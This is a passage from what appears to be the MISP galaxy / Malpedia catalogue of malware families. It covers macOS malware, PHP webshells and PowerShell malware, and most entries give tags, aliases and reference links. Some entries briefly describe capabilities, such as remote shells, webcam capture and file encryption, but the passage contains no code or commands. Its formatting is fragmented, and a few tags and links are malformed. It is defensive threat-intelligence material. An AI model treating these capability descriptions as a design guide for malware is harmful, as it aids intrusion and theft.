The tag is: misp-galaxy:malpedia="DarthMiner"

DarthMiner is also known as:

Table 1151. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.dartminer">https://malpedia.caad.fkie.fraunhofer.de/details/osx.dartminer</a></td>
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Dockster

The tag is: `misp-galaxy:malpedia="Dockster"`

Dockster is also known as:

* Table 1152. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster">https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster</a></td>
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Dummy

The tag is: `misp-galaxy:malpedia="Dummy"`

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* Table 1153. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy">https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x32.html">https://objective-see.com/blog/blog_0x32.html</a></td>
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Eleanor

Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.

The Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address.

The Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.

The web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:

- Managing files
- Listing processes
- Connecting to various database management systems such as MySQL or SQLite
- Connecting via bind/reverse shell
- Executing shell command
Capturing and browsing images and videos from the victim’s webcam

Sending emails with an attachment

The tag is: misp-galaxy:malpedia=“Eleanor”

Eleanor is also known as:

Table 1154. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor">https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor</a></td>
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ElectroRAT

The tag is: misp-galaxy:malpedia=“ElectroRAT”

ElectroRAT is also known as:

Table 1155. Table References

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<td><a href="https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/">https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x61.html">https://objective-see.com/blog/blog_0x61.html</a></td>
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EvilOSX

The tag is: misp-galaxy:malpedia=“EvilOSX”

EvilOSX is also known as:

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<td><a href="https://github.com/Marten4n6/EvilOSX">https://github.com/Marten4n6/EvilOSX</a></td>
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<td><a href="https://twitter.com/JohnLaTwC/status/966139336436498432">https://twitter.com/JohnLaTwC/status/966139336436498432</a></td>
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EvilQuest

The tag is: misp-galaxy:malpedia=“EvilQuest”

EvilQuest is also known as:

- ThiefQuest
Table 1157. Table References

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<td><a href="https://github/gd/bin/evilquest_deobfuscator">https://github/gd/bin/evilquest_deobfuscator</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x5F.html">https://objective-see.com/blog/blog_0x5F.html</a></td>
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FailyTale

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FinFisher (OS X)

The tag is: misp-galaxy:malpedia="FinFisher (OS X)"

FinFisher (OS X) is also known as:

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<td><a href="https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/">https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x4F.html">https://objective-see.com/blog/blog_0x4F.html</a></td>
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**FlashBack**

The tag is: *misp-galaxy:malpedia=*"FlashBack"

FlashBack is also known as:

- FakeFlash

*Table 1160. Table References*

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<td><a href="http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html">http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html</a></td>
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<td><a href="https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed">https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed</a></td>
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<td><a href="https://en.wikipedia.org/wiki/Flashback_(Trojan)">https://en.wikipedia.org/wiki/Flashback_(Trojan)</a></td>
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**FruitFly**

The tag is: *misp-galaxy:malpedia=*"FruitFly"

FruitFly is also known as:

- Quimitchin

*Table 1161. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly">https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly</a></td>
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<td><a href="https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html">https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html</a></td>
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<td><a href="https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/">https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/</a></td>
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**Gmera**

The tag is: *misp-galaxy:malpedia=*"Gmera"

Gmera is also known as:
• Kassi
• StockSteal

Table 1162. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera">https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x53.html">https://objective-see.com/blog/blog_0x53.html</a></td>
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**HiddenLotus**

The tag is: `misp-galaxy:malpedia="HiddenLotus"`

HiddenLotus is also known as:

Table 1163. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus">https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus</a></td>
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</table>

**iMuler**

The threat was a multi-stage malware displaying a decoy that appeared to the victim as a Chinese language article on the long-running dispute over the Diaoyu Islands; an array of erotic pictures; or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and iMuler was the backdoor capable of the following operations:

• capture screenshots
• exfiltrate files to a remote computer
• send various information about the infected computer
• extract ZIP archive
• download files from a remote computer and/or the Internet
• run executable files

The tag is: `misp-galaxy:malpedia="iMuler"`

iMuler is also known as:

• Revir
Table 1164. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler">https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/">https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/</a></td>
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<td><a href="http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html">http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html</a></td>
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**Janicab**

The tag is: *misp-galaxy:malpedia="Janicab"*

Janicab is also known as:

Table 1165. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab">https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab</a></td>
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<tr>
<td><a href="https://securelist.com/deathstalker-mercenary-triumvirate/98177/">https://securelist.com/deathstalker-mercenary-triumvirate/98177/</a></td>
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<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
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<td><a href="https://www.macmark.de/blog/osx_blog_2013-08-a.php">https://www.macmark.de/blog/osx_blog_2013-08-a.php</a></td>
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<td><a href="https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html">https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html</a></td>
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**KeRanger**

The tag is: *misp-galaxy:malpedia="KeRanger"*

KeRanger is also known as:

Table 1166. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger">https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger</a></td>
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Keydnap

The tag is: misp-galaxy:malpedia="Keydnap"

Keydnap is also known as:

Table 1167. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap">https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap</a></td>
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<td><a href="https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/">https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/</a></td>
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<td><a href="https://github.com/eset/malware-ioc/tree/master/keydnap">https://github.com/eset/malware-ioc/tree/master/keydnap</a></td>
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Kitmos

The tag is: misp-galaxy:malpedia="Kitmos"

Kitmos is also known as:

- KitM

Table 1168. Table References

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Komplex

The tag is: misp-galaxy:malpedia="Komplex"

Komplex is also known as:

- JHUHUGIT
- JKEYSKW
- SedUploader

Table 1169. Table References

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<td><a href="https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html">https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html</a></td>
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Laoshu

The tag is: misp-galaxy:malpedia="Laoshu"

Laoshu is also known as:

Table 1170. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu
https://objective-see.com/blog/blog_0x16.html

Leverage

The tag is: misp-galaxy:malpedia="Leverage"

Leverage is also known as:

Table 1171. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage
https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis

MacDownloader

The tag is: misp-galaxy:malpedia="MacDownloader"

MacDownloader is also known as:

Table 1172. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
MacInstaller

The tag is: `misp-galaxy:malpedia="MacInstaller"`

MacInstaller is also known as:

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MacRansom

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MacRansom is also known as:

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MacSpy

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MacSpy is also known as:

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MacVX

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MacVX is also known as:

Table 1176. Table References
MaMi

The tag is: `misp-galaxy:malpedia="MaMi"`

MaMi is also known as:

Table 1177. Table References

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Manuscrypt

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Manuscrypt is also known as:

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Mokes (OS X)

The tag is: `misp-galaxy:malpedia="Mokes (OS X)"`

Mokes (OS X) is also known as:

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<td><a href="https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/">https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/</a></td>
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**Mughthesec**

The tag is: misp-galaxy:malpedia="Mughthesec"

Mughthesec is also known as:

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<td><a href="https://objective-see.com/blog/blog_0x20.html">https://objective-see.com/blog/blog_0x20.html</a></td>
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**OceanLotus**

The tag is: misp-galaxy:malpedia="OceanLotus"

OceanLotus is also known as:

**Table 1181. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus">https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></td>
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<td><a href="https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-%E1%BB%9B%E1%BB%93-i-t%C3%B4-c%C3%B3-%C0%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%E1%AAn-fb-may-qu%E1%BA%A7i-%C0%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%AChn-hg%E1%BB%ADi-cho-537b19ee3468">https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-%E1%BB%9B%E1%BB%93-i-t%C3%B4-c%C3%B3-%C0%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%E1%AAn-fb-may-qu%E1%BA%A7i-%C0%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%AChn-hg%E1%BB%ADi-cho-537b19ee3468</a></td>
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<td><a href="https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam">https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam</a></td>
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Olyx

The tag is: *misp-galaxy:malpedia="Olyx"*

Olyx is also known as:

Table 1182. Table References

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<td><a href="https://news.drweb.com/show/?i=1750&amp;lng=en&amp;c=14">https://news.drweb.com/show/?i=1750&amp;lng=en&amp;c=14</a></td>
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OSAMiner

The tag is: *misp-galaxy:malpedia="OSAMiner"*

OSAMiner is also known as:

Table 1183. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.osaminer">https://malpedia.caad.fkie.fraunhofer.de/details/osx.osaminer</a></td>
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Patcher

This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software like Adobe Premiere Pro or Microsoft Office for Mac.

The downloaded torrent contained an application bundle in the form of a single zip file. After launching the fake application, the main window of the fake cracking tool was displayed.

The file encryption process was launched after the misguided victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and set it as the key for RC4 encryption of all of the user’s files. It then demanded ransom in Bitcoin, as instructed in the 'README!' .txt file copied all over the user’s directories.

Despite the instructions being quite thorough, Patcher lacked the functionality to communicate with any C&C server, and therefore made it impossible for its operators to decrypt affected files. The randomly generated encryption key was also too long to be guessed via a brute-force attack, leaving the encrypted data unrecoverable in a reasonable amount of time.

The tag is: *misp-galaxy:malpedia="Patcher"*

Patcher is also known as:
• FileCoder
• Findzip

Table 1184. Table References

<table>
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<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher">https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher</a></td>
</tr>
<tr>
<td><a href="http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/">http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/</a></td>
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</tbody>
</table>

**PintSized**

Backdoor as a fork of OpenSSH_6.0 with no logging, and "-P" and "-z" hidden command arguments. "PuffySSH_5.8p1" string.

The tag is: `misp-galaxy:malpedia="PintSized"`

PintSized is also known as:

Table 1185. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized">https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized</a></td>
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<tr>
<td><a href="https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/">https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/</a></td>
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**Pirrit**

The tag is: `misp-galaxy:malpedia="Pirrit"`

Pirrit is also known as:

Table 1186. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit">https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit</a></td>
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<tr>
<td><a href="http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf">http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf</a></td>
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**Proton RAT**

The tag is: `misp-galaxy:malpedia="Proton RAT"`

Proton RAT is also known as:
Calisto

Table 1187. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat">https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat</a></td>
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<td><a href="https://securelist.com/calisto-trojan-for-macos/86543/">https://securelist.com/calisto-trojan-for-macos/86543/</a></td>
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<td><a href="https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/">https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x1F.html">https://objective-see.com/blog/blog_0x1F.html</a></td>
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<td><a href="https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/">https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x1D.html">https://objective-see.com/blog/blog_0x1D.html</a></td>
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Pwnet

Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.

The tag is: *misp-galaxy:malpedia="Pwnet"

Pwnet is also known as:

Table 1188. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet">https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet</a></td>
</tr>
</tbody>
</table>

Dok

Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.

The tag is: *misp-galaxy:malpedia="Dok"
Dok is also known as:

- Retefe

**Table 1189. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe">https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe</a></td>
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<td><a href="https://www.govcert.admin.ch/blog/33/the-retefe-saga">https://www.govcert.admin.ch/blog/33/the-retefe-saga</a></td>
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**Shlayer**

The tag is: misp-galaxy:malpedia="Shlayer"

Shlayer is also known as:

**Table 1190. Table References**

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<td><a href="https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/">https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/</a></td>
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<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-345a">https://us-cert.cisa.gov/ncas/alerts/aa20-345a</a></td>
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<td><a href="https://securelist.com/shlayer-for-macos/95724/">https://securelist.com/shlayer-for-macos/95724/</a></td>
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**Silver Sparrow**

According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple's new M1 chips but has been distributed without payload so far.

The tag is: misp-galaxy:malpedia="Silver Sparrow"

Silver Sparrow is also known as:

**Table 1191. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow">https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow</a></td>
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<td><a href="https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis">https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis</a></td>
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**systemd**

General purpose backdoor
systemd is also known as:

Table 1192. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd">https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd</a></td>
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<td><a href="https://vms.drweb.com/virus/?_is=1&amp;i=15299312&amp;lng=en">https://vms.drweb.com/virus/?_is=1&amp;i=15299312&amp;lng=en</a></td>
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Tsunami (OS X)

The tag is: misp-galaxy:malpedia="Tsunami (OS X)"

Tsunami (OS X) is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami">https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami</a></td>
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<tr>
<td><a href="https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks">https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks</a></td>
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Unidentified macOS 001 (UnionCryptoTrader)

The tag is: misp-galaxy:malpedia="Unidentified macOS 001 (UnionCryptoTrader)"

Unidentified macOS 001 (UnionCryptoTrader) is also known as:

Table 1194. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001">https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001</a></td>
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<td><a href="https://objective-see.com/blog/blog_0x51.html">https://objective-see.com/blog/blog_0x51.html</a></td>
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<td><a href="https://securelist.com/operation-applejeus-sequel/95596/">https://securelist.com/operation-applejeus-sequel/95596/</a></td>
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Uroburos (OS X)

The tag is: misp-galaxy:malpedia="Uroburos (OS X)"

Uroburos (OS X) is also known as:

Table 1195. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos">https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos</a></td>
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<td><a href="https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/">https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/</a></td>
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Vigram

The tag is: misp-galaxy:malpedia="Vigram"

Vigram is also known as:

- WizardUpdate

Table 1196. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram
- https://twitter.com/ConfiantIntel/status/1351559054565535745

WatchCat

The tag is: misp-galaxy:malpedia="WatchCat"

WatchCat is also known as:

Table 1197. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/osx.watchcat
- https://objective-see.com/blog/blog_0x5F.html

WindTail

The tag is: misp-galaxy:malpedia="WindTail"

WindTail is also known as:

Table 1198. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail
- https://objective-see.com/blog/blog_0x3D.html
- https://objective-see.com/blog/blog_0x3B.html
- https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56
Winnti (OS X)

The tag is: `misp-galaxy:malpedia="Winnti (OS X)"

Winnti (OS X) is also known as:

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<td><a href="https://401trg.pw/winnti-evolution-going-open-source/">https://401trg.pw/winnti-evolution-going-open-source/</a></td>
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WireLurker (OS X)

The tag is: `misp-galaxy:malpedia="WireLurker (OS X)"

WireLurker (OS X) is also known as:

Table 1200. Table References

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Wirenet (OS X)

The tag is: `misp-galaxy:malpedia="Wirenet (OS X)"

Wirenet (OS X) is also known as:

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<td><a href="https://news.drweb.com/show/?i=2679&amp;lng=en&amp;c=14">https://news.drweb.com/show/?i=2679&amp;lng=en&amp;c=14</a></td>
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**X-Agent (OS X)**

The tag is: *misp-galaxy:malpedia="X-Agent (OS X)"

X-Agent (OS X) is also known as:

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<td><a href="https://twitter.com/PhysicalDrive0/status/845009226388918273">https://twitter.com/PhysicalDrive0/status/845009226388918273</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/iron-twilight">https://www.secureworks.com/research/threat-profiles/iron-twilight</a></td>
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**XCSSET**

The tag is: *misp-galaxy:malpedia="XCSSET"

XCSSET is also known as:

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**XSLCmd**

The tag is: *misp-galaxy:malpedia="XSLCmd"

XSLCmd is also known as:

*Table 1204. Table References*

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Yort

The tag is: `misp-galaxy:malpedia="Yort"`

Yort is also known as:

Table 1205. Table References

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Ani-Shell

Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dossier, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.

The tag is: `misp-galaxy:malpedia="Ani-Shell"`

Ani-Shell is also known as:

- anishell

Table 1206. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/php.anishell">https://malpedia.caad.fkie.fraunhofer.de/details/php.anishell</a></td>
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<td><a href="https://github.com/tennc/webshell/tree/master/php/Ani-Shell">https://github.com/tennc/webshell/tree/master/php/Ani-Shell</a></td>
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<tr>
<td><a href="http://ani-shell.sourceforge.net/">http://ani-shell.sourceforge.net/</a></td>
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ANTAK

Antak is a webshell written in ASP.Net which utilizes PowerShell.

The tag is: `misp-galaxy:malpedia="ANTAK"`

ANTAK is also known as:

Table 1207. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/php.antak">https://malpedia.caad.fkie.fraunhofer.de/details/php.antak</a></td>
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</table>
C99shell is a PHP backdoor that provides a lot of functionality, for example:

- run shell commands;
- download/upload files from and to the server (FTP functionality);
- full access to all files on the hard disk;
- self-delete functionality.

The tag is: misc-galaxy:malpedia="c99shell"

c99shell is also known as:

- c99

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<th>Table 1208. Table References</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/php.c99">https://malpedia.caad.fkie.fraunhofer.de/details/php.c99</a></td>
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<tr>
<td><a href="https://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html">https://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html</a></td>
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DEWMODE

FireEye discovered the DEWMODE webshell starting mid-December 2020 after exploitation of zero-day vulnerabilities in Accellion’s File Transfer Appliance.

The tag is: misc-galaxy:malpedia="DEWMODE"

DEWMODE is also known as:

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<th>Table 1209. Table References</th>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode">https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a">https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a</a></td>
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Ensikology

The tag is: misc-galaxy:malpedia="Ensikology"
Ensikology is also known as:

- Ensiko

Table 1210. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/php.ensikology">https://malpedia.caad.fkie.fraunhofer.de/details/php.ensikology</a></td>
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**PAS**

The tag is: `misp-galaxy:malpedia="PAS"`

PAS is also known as:

Table 1211. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/php.pas">https://malpedia.caad.fkie.fraunhofer.de/details/php.pas</a></td>
</tr>
<tr>
<td><a href="https://blog.erratasec.com/2016/12/some-notes-on-iocs.html">https://blog.erratasec.com/2016/12/some-notes-on-iocs.html</a></td>
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**RedHat Hacker WebShell**

The tag is: `misp-galaxy:malpedia="RedHat Hacker WebShell"`

RedHat Hacker WebShell is also known as:

Table 1212. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/php.redhat_hacker">https://malpedia.caad.fkie.fraunhofer.de/details/php.redhat_hacker</a></td>
</tr>
<tr>
<td><a href="https://github.com/xl7dev/WebShell/blob/master/Asp/RedHat%20Hacker.asp">https://github.com/xl7dev/WebShell/blob/master/Asp/RedHat%20Hacker.asp</a></td>
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**WSO**

The tag is: `misp-galaxy:malpedia="WSO"`

WSO is also known as:

- Webshell by Orb

Table 1213. Table References
Silence DDoS

The tag is: `misp-galaxy:malpedia="Silence DDoS"`

Silence DDoS is also known as:

Table 1214. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos">https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos</a></td>
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<tr>
<td><a href="https://www.group-ib.com/resources/threat-research/silence.html">https://www.group-ib.com/resources/threat-research/silence.html</a></td>
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BONDUPDATER

The tag is: `misp-galaxy:malpedia="BONDUPDATER"`

BONDUPDATER is also known as:

- Glimpse
- Poison Frog

Table 1215. Table References

<table>
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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater</a></td>
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<tr>
<td><a href="https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933">https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933</a></td>
</tr>
<tr>
<td><a href="https://marcoramilli.com/2019/05/02/apt34-glimpse-project/">https://marcoramilli.com/2019/05/02/apt34-glimpse-project/</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/">https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-gypsy">https://www.secureworks.com/research/threat-profiles/cobalt-gypsy</a></td>
</tr>
<tr>
<td><a href="https://ironnet.com/blog/chirp-of-the-poisonfrog/">https://ironnet.com/blog/chirp-of-the-poisonfrog/</a></td>
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CASHY200

The tag is: `misp-galaxy:malpedia="CASHY200"`

CASHY200 is also known as:

Table 1216. Table References

Links
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.cashy200
- https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/

FlowerPower

The tag is: `misp-galaxy:malpedia="FlowerPower"`

FlowerPower is also known as:

Table 1217. Table References

Links
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower

FRat Loader

Loader used to deliver FRat (see family windows.frat)

The tag is: `misp-galaxy:malpedia="FRat Loader"`

FRat Loader is also known as:

Table 1218. Table References

Links
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.frat_loader
- https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md

FTCODE

The malware ftcode is a ransomware which encrypts files and changes their extension into .FTCODE. It later asks for a ransom in order to release the decryption key, mandatory to recover
your files. It is infamous for attacking Italy pretending to be a notorious telecom provider asking for due payments.

The tag is: `misp-galaxy:malpedia="FTCODE"`

**FTCODE is also known as:**

**Table 1219. Table References**

<table>
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<th>Links</th>
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<tr>
<td>[8] <a href="https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/">https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/</a></td>
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**GhostMiner**

The tag is: `misp-galaxy:malpedia="GhostMiner"`

**GhostMiner is also known as:**

**Table 1220. Table References**

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**JasperLoader**

The tag is: `misp-galaxy:malpedia="JasperLoader"`

**JasperLoader is also known as:**

**Table 1221. Table References**

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<td>[1]</td>
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468
LightBot

According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.

The tag is: misp-galaxy:malpedia="LightBot"

LightBot is also known as:

Table 1222. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot</a></td>
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<tr>
<td><a href="https://twitter.com/VK_Intel/status/1329511151202349057">https://twitter.com/VK_Intel/status/1329511151202349057</a></td>
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</tbody>
</table>

Octopus (Powershell)

The author describes Octopus as an "open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S."

It is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.

The tag is: misp-galaxy:malpedia="Octopus (Powershell)"

Octopus (Powershell) is also known as:

Table 1223. Table References

<table>
<thead>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus">https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus</a></td>
